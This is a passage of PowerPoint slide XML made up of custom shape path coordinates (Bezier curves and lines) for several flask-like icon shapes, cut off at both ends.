                  <a:pt x="18514" y="16691"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18514" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20057" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20909" y="2945"/>
                  <a:pt x="21600" y="2506"/>
                  <a:pt x="21600" y="1964"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="440"/>
                  <a:pt x="20909" y="0"/>
                  <a:pt x="20057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2" name="Shape 2752"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8397301" y="3949265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7673"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12269" y="17673"/>
                  <a:pt x="12000" y="17892"/>
                  <a:pt x="12000" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12000" y="18435"/>
                  <a:pt x="12269" y="18655"/>
                  <a:pt x="12600" y="18655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12931" y="18655"/>
                  <a:pt x="13200" y="18435"/>
                  <a:pt x="13200" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13200" y="17892"/>
                  <a:pt x="12931" y="17673"/>
                  <a:pt x="12600" y="17673"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="13745"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10138" y="13745"/>
                  <a:pt x="9600" y="14186"/>
                  <a:pt x="9600" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9600" y="15269"/>
                  <a:pt x="10138" y="15709"/>
                  <a:pt x="10800" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11462" y="15709"/>
                  <a:pt x="12000" y="15269"/>
                  <a:pt x="12000" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12000" y="14186"/>
                  <a:pt x="11462" y="13745"/>
                  <a:pt x="10800" y="13745"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12600" y="10800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12269" y="10800"/>
                  <a:pt x="12000" y="10580"/>
                  <a:pt x="12000" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12000" y="10038"/>
                  <a:pt x="12269" y="9818"/>
                  <a:pt x="12600" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12931" y="9818"/>
                  <a:pt x="13200" y="10038"/>
                  <a:pt x="13200" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13200" y="10580"/>
                  <a:pt x="12931" y="10800"/>
                  <a:pt x="12600" y="10800"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12600" y="8836"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11606" y="8836"/>
                  <a:pt x="10800" y="9496"/>
                  <a:pt x="10800" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="11123"/>
                  <a:pt x="11606" y="11782"/>
                  <a:pt x="12600" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13594" y="11782"/>
                  <a:pt x="14400" y="11123"/>
                  <a:pt x="14400" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14400" y="9496"/>
                  <a:pt x="13594" y="8836"/>
                  <a:pt x="12600" y="8836"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="17760" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3840" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2134" y="19151"/>
                  <a:pt x="1200" y="17248"/>
                  <a:pt x="1200" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1200" y="12593"/>
                  <a:pt x="2796" y="10152"/>
                  <a:pt x="5468" y="8688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5800" y="8506"/>
                  <a:pt x="6000" y="8199"/>
                  <a:pt x="6000" y="7872"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6000" y="6529"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6729" y="6758"/>
                  <a:pt x="7567" y="6924"/>
                  <a:pt x="8484" y="6924"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9499" y="6924"/>
                  <a:pt x="10603" y="6723"/>
                  <a:pt x="11748" y="6188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13252" y="5485"/>
                  <a:pt x="14575" y="5306"/>
                  <a:pt x="15600" y="5323"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15600" y="7872"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15600" y="8199"/>
                  <a:pt x="15800" y="8506"/>
                  <a:pt x="16132" y="8688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18804" y="10152"/>
                  <a:pt x="20400" y="12593"/>
                  <a:pt x="20400" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20400" y="17248"/>
                  <a:pt x="19466" y="19151"/>
                  <a:pt x="17760" y="20618"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="15600" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15600" y="4340"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14391" y="4322"/>
                  <a:pt x="12860" y="4538"/>
                  <a:pt x="11152" y="5336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9163" y="6265"/>
                  <a:pt x="7312" y="5965"/>
                  <a:pt x="6000" y="5473"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6000" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6000" y="2945"/>
                  <a:pt x="15600" y="2945"/>
                  <a:pt x="15600" y="2945"/>
                </a:cubicBezTo>
                <a:close/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00" y="7872"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16800" y="2945"/>
                </a:ln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800" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4800" y="7872"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1906" y="9457"/>
                  <a:pt x="0" y="12155"/>
                  <a:pt x="0" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="17730"/>
                  <a:pt x="1286" y="19991"/>
                  <a:pt x="3342" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18258" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20313" y="19991"/>
                  <a:pt x="21600" y="17730"/>
                  <a:pt x="21600" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="12155"/>
                  <a:pt x="19693" y="9457"/>
                  <a:pt x="16800" y="7872"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16200" y="15709"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15869" y="15709"/>
                  <a:pt x="15600" y="15929"/>
                  <a:pt x="15600" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15600" y="16471"/>
                  <a:pt x="15869" y="16691"/>
                  <a:pt x="16200" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16531" y="16691"/>
                  <a:pt x="16800" y="16471"/>
                  <a:pt x="16800" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16800" y="15929"/>
                  <a:pt x="16531" y="15709"/>
                  <a:pt x="16200" y="15709"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7800" y="11782"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7469" y="11782"/>
                  <a:pt x="7200" y="12001"/>
                  <a:pt x="7200" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7200" y="12544"/>
                  <a:pt x="7469" y="12764"/>
                  <a:pt x="7800" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8131" y="12764"/>
                  <a:pt x="8400" y="12544"/>
                  <a:pt x="8400" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8400" y="12001"/>
                  <a:pt x="8131" y="11782"/>
                  <a:pt x="7800" y="11782"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6000" y="15709"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5338" y="15709"/>
                  <a:pt x="4800" y="16149"/>
                  <a:pt x="4800" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4800" y="17233"/>
                  <a:pt x="5338" y="17673"/>
                  <a:pt x="6000" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6662" y="17673"/>
                  <a:pt x="7200" y="17233"/>
                  <a:pt x="7200" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7200" y="16149"/>
                  <a:pt x="6662" y="15709"/>
                  <a:pt x="6000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3" name="Shape 2753"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8930562" y="3949265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00" y="18655"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="13468" y="18655"/>
                  <a:pt x="13200" y="18874"/>
                  <a:pt x="13200" y="19145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13200" y="19417"/>
                  <a:pt x="13468" y="19636"/>
                  <a:pt x="13800" y="19636"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14132" y="19636"/>
                  <a:pt x="14400" y="19417"/>
                  <a:pt x="14400" y="19145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14400" y="18874"/>
                  <a:pt x="14132" y="18655"/>
                  <a:pt x="13800" y="18655"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10200" y="15709"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9868" y="15709"/>
                  <a:pt x="9600" y="15490"/>
                  <a:pt x="9600" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9600" y="14947"/>
                  <a:pt x="9868" y="14727"/>
                  <a:pt x="10200" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10532" y="14727"/>
                  <a:pt x="10800" y="14947"/>
                  <a:pt x="10800" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="15490"/>
                  <a:pt x="10532" y="15709"/>
                  <a:pt x="10200" y="15709"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10200" y="13745"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9206" y="13745"/>
                  <a:pt x="8400" y="14405"/>
                  <a:pt x="8400" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8400" y="16031"/>
                  <a:pt x="9206" y="16691"/>
                  <a:pt x="10200" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11194" y="16691"/>
                  <a:pt x="12000" y="16031"/>
                  <a:pt x="12000" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12000" y="14405"/>
                  <a:pt x="11194" y="13745"/>
                  <a:pt x="10200" y="13745"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="15600" y="13745"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14938" y="13745"/>
                  <a:pt x="14400" y="14186"/>
                  <a:pt x="14400" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14400" y="15269"/>
                  <a:pt x="14938" y="15709"/>
                  <a:pt x="15600" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16262" y="15709"/>
                  <a:pt x="16800" y="15269"/>
                  <a:pt x="16800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16800" y="14186"/>
                  <a:pt x="16262" y="13745"/>
                  <a:pt x="15600" y="13745"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="14400" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7200" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3892" y="20618"/>
                  <a:pt x="1200" y="18416"/>
                  <a:pt x="1200" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1200" y="13123"/>
                  <a:pt x="2182" y="11620"/>
                  <a:pt x="3320" y="9880"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3477" y="9639"/>
                  <a:pt x="3636" y="9392"/>
                  <a:pt x="3797" y="9140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3905" y="9093"/>
                  <a:pt x="6420" y="8038"/>
                  <a:pt x="9814" y="9625"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10959" y="10160"/>
                  <a:pt x="12064" y="10360"/>
                  <a:pt x="13079" y="10360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15152" y="10360"/>
                  <a:pt x="16846" y="9523"/>
                  <a:pt x="17711" y="8991"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17902" y="9295"/>
                  <a:pt x="18093" y="9592"/>
                  <a:pt x="18280" y="9880"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19418" y="11620"/>
                  <a:pt x="20400" y="13123"/>
                  <a:pt x="20400" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20400" y="18416"/>
                  <a:pt x="17708" y="20618"/>
                  <a:pt x="14400" y="20618"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="5967" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15633" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15782" y="5133"/>
                  <a:pt x="16425" y="6735"/>
                  <a:pt x="17180" y="8090"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16281" y="8690"/>
                  <a:pt x="13509" y="10220"/>
                  <a:pt x="10410" y="8772"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7921" y="7609"/>
                  <a:pt x="5800" y="7679"/>
                  <a:pt x="4520" y="7912"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5231" y="6594"/>
                  <a:pt x="5824" y="5037"/>
                  <a:pt x="5967" y="2945"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="36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3600" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3600" y="1964"/>
                  <a:pt x="3600" y="982"/>
                  <a:pt x="3600" y="982"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16843" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18000" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18662" y="2945"/>
                  <a:pt x="19200" y="2505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3600" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2938" y="0"/>
                  <a:pt x="2400" y="440"/>
                  <a:pt x="2400" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2400" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2400" y="2505"/>
                  <a:pt x="2938" y="2945"/>
                  <a:pt x="3600" y="2945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4757" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4322" y="8937"/>
                  <a:pt x="0" y="10114"/>
                  <a:pt x="0" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="18962"/>
                  <a:pt x="3224" y="21600"/>
                  <a:pt x="7200" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14400" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18376" y="21600"/>
                  <a:pt x="21600" y="18962"/>
                  <a:pt x="21600" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="10114"/>
                  <a:pt x="17278" y="8937"/>
                  <a:pt x="16843" y="2945"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="17400" y="11782"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17068" y="11782"/>
                  <a:pt x="16800" y="12001"/>
                  <a:pt x="16800" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16800" y="12544"/>
                  <a:pt x="17068" y="12764"/>
                  <a:pt x="17400" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17732" y="12764"/>
                  <a:pt x="18000" y="12544"/>
                  <a:pt x="18000" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18000" y="12001"/>
                  <a:pt x="17732" y="11782"/>
                  <a:pt x="17400" y="11782"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6000" y="10800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5338" y="10800"/>
                  <a:pt x="4800" y="11240"/>
                  <a:pt x="4800" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4800" y="12324"/>
                  <a:pt x="5338" y="12764"/>
                  <a:pt x="6000" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6662" y="12764"/>
                  <a:pt x="7200" y="12324"/>
                  <a:pt x="7200" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7200" y="11240"/>
                  <a:pt x="6662" y="10800"/>
                  <a:pt x="6000" y="10800"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="5400" y="16691"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5068" y="16691"/>
                  <a:pt x="4800" y="16910"/>
                  <a:pt x="4800" y="17182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4800" y="17453"/>
                  <a:pt x="5068" y="17673"/>
                  <a:pt x="5400" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5732" y="17673"/>
                  <a:pt x="6000" y="17453"/>
                  <a:pt x="6000" y="17182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6000" y="16910"/>
                  <a:pt x="5732" y="16691"/>
                  <a:pt x="540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4" name="Shape 2754"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9451126" y="3949265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709"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10203" y="15709"/>
                  <a:pt x="9720" y="16149"/>
                  <a:pt x="9720" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9720" y="17233"/>
                  <a:pt x="10203" y="17673"/>
                  <a:pt x="10800" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11396" y="17673"/>
                  <a:pt x="11880" y="17233"/>
                  <a:pt x="11880" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11880" y="16149"/>
                  <a:pt x="11396" y="15709"/>
                  <a:pt x="10800" y="15709"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12960" y="10800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12363" y="10800"/>
                  <a:pt x="11880" y="11240"/>
                  <a:pt x="11880" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11880" y="12324"/>
                  <a:pt x="12363" y="12764"/>
                  <a:pt x="12960" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13556" y="12764"/>
                  <a:pt x="14040" y="12324"/>
                  <a:pt x="14040" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14040" y="11240"/>
                  <a:pt x="13556" y="10800"/>
                  <a:pt x="12960" y="10800"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="15660" y="14727"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15362" y="14727"/>
                  <a:pt x="15120" y="14947"/>
                  <a:pt x="15120" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15120" y="15490"/>
                  <a:pt x="15362" y="15709"/>
                  <a:pt x="15660" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15958" y="15709"/>
                  <a:pt x="16200" y="15490"/>
                  <a:pt x="16200" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="14947"/>
                  <a:pt x="15958" y="14727"/>
                  <a:pt x="15660" y="14727"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16740" y="17673"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16442" y="17673"/>
                  <a:pt x="16200" y="17892"/>
                  <a:pt x="16200" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="18435"/>
                  <a:pt x="16442" y="18655"/>
                  <a:pt x="16740" y="18655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17038" y="18655"/>
                  <a:pt x="17280" y="18435"/>
                  <a:pt x="17280" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17280" y="17892"/>
                  <a:pt x="17038" y="17673"/>
                  <a:pt x="16740" y="17673"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7020" y="13745"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6722" y="13745"/>
                  <a:pt x="6480" y="13525"/>
                  <a:pt x="6480" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6480" y="12983"/>
                  <a:pt x="6722" y="12764"/>
                  <a:pt x="7020" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7318" y="12764"/>
                  <a:pt x="7560" y="12983"/>
                  <a:pt x="7560" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7560" y="13525"/>
                  <a:pt x="7318" y="13745"/>
                  <a:pt x="7020" y="13745"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7020" y="11782"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6126" y="11782"/>
                  <a:pt x="5400" y="12441"/>
                  <a:pt x="5400" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="14068"/>
                  <a:pt x="6126" y="14727"/>
                  <a:pt x="7020" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7914" y="14727"/>
                  <a:pt x="8640" y="14068"/>
                  <a:pt x="8640" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8640" y="12441"/>
                  <a:pt x="7914" y="11782"/>
                  <a:pt x="7020" y="11782"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16200" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5400" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5224" y="20618"/>
                  <a:pt x="1080" y="20574"/>
                  <a:pt x="1080" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1080" y="12965"/>
                  <a:pt x="3149" y="11214"/>
                  <a:pt x="4975" y="9670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6031" y="8777"/>
                  <a:pt x="7028" y="7920"/>
                  <a:pt x="7400" y="6808"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7683" y="6848"/>
                  <a:pt x="7974" y="6878"/>
                  <a:pt x="8279" y="6878"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9182" y="6878"/>
                  <a:pt x="10166" y="6687"/>
                  <a:pt x="11184" y="6177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12256" y="5642"/>
                  <a:pt x="13226" y="5425"/>
                  <a:pt x="14040" y="5367"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14040" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14040" y="7483"/>
                  <a:pt x="15296" y="8546"/>
                  <a:pt x="16625" y="9670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18451" y="11214"/>
                  <a:pt x="20520" y="12965"/>
                  <a:pt x="20520" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20520" y="20474"/>
                  <a:pt x="16637" y="20614"/>
                  <a:pt x="16200" y="20618"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="14040" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14040" y="4432"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13069" y="4489"/>
                  <a:pt x="11917" y="4734"/>
                  <a:pt x="10654" y="5365"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9547" y="5920"/>
                  <a:pt x="8485" y="6015"/>
                  <a:pt x="7560" y="5894"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7560" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7560" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7560" y="2945"/>
                  <a:pt x="14040" y="2945"/>
                  <a:pt x="14040" y="2945"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5400" y="982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16200" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16200" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5400" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="1964"/>
                  <a:pt x="5400" y="982"/>
                  <a:pt x="5400" y="982"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15120" y="5891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15120" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16200" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16796" y="2945"/>
                  <a:pt x="17280" y="2505"/>
                  <a:pt x="17280" y="1964"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17280" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17280" y="440"/>
                  <a:pt x="16796" y="0"/>
                  <a:pt x="16200" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5400" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4803" y="0"/>
                  <a:pt x="4320" y="440"/>
                  <a:pt x="4320" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4320" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4320" y="2505"/>
                  <a:pt x="4803" y="2945"/>
                  <a:pt x="5400" y="2945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6480" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6480" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6480" y="8836"/>
                  <a:pt x="0" y="9818"/>
                  <a:pt x="0" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="21600"/>
                  <a:pt x="5400" y="21600"/>
                  <a:pt x="5400" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16200" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="21600"/>
                  <a:pt x="21600" y="21600"/>
                  <a:pt x="21600" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="9818"/>
                  <a:pt x="15120" y="8836"/>
                  <a:pt x="15120" y="5891"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="5940" y="16691"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5642" y="16691"/>
                  <a:pt x="5400" y="16910"/>
                  <a:pt x="5400" y="17182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="17453"/>
                  <a:pt x="5642" y="17673"/>
                  <a:pt x="5940" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6238" y="17673"/>
